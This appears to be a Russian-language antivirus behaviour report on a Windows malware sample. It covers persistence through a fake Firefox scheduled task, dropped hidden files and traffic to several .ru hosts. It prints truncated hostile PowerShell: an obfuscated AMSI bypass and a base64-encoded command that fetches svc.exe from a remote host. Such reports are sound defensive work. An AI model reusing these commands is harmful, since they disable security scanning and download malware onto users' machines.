Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\firefox default browser agent fee92093c5a86ce1
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\libraries\svc.exe
- %APPDATA%\fdggssi
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\fdggssi
Удаляет следующие файлы
- C:\users\public\libraries\svc.exe
Сетевая активность
Подключается к
- 'go######ersportuni##m.ru':80
- 'al######arusmulticopter.ru':80
- 'st#####roculturnaya.ru':80
TCP
Запросы HTTP GET
- http://go######ersportuni##m.ru/load/svc.exe
Запросы HTTP POST
- http://al######arusmulticopter.ru/index.php
- http://st#####roculturnaya.ru/index.php
UDP
- DNS ASK go######ersportuni##m.ru
- DNS ASK al######arusmulticopter.ru
- DNS ASK jo######coninteraption.ru
- DNS ASK st#####roculturnaya.ru
Другое
Создает и запускает на исполнение
- 'C:\users\public\libraries\svc.exe'
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AZwBvAG8AZABtAGEAcwB0AGUAcgBzAHAAbwByAHQAdQBuAGkAYwB1AG0ALgByAHUALwBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAF...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi... (со скрытым окном)
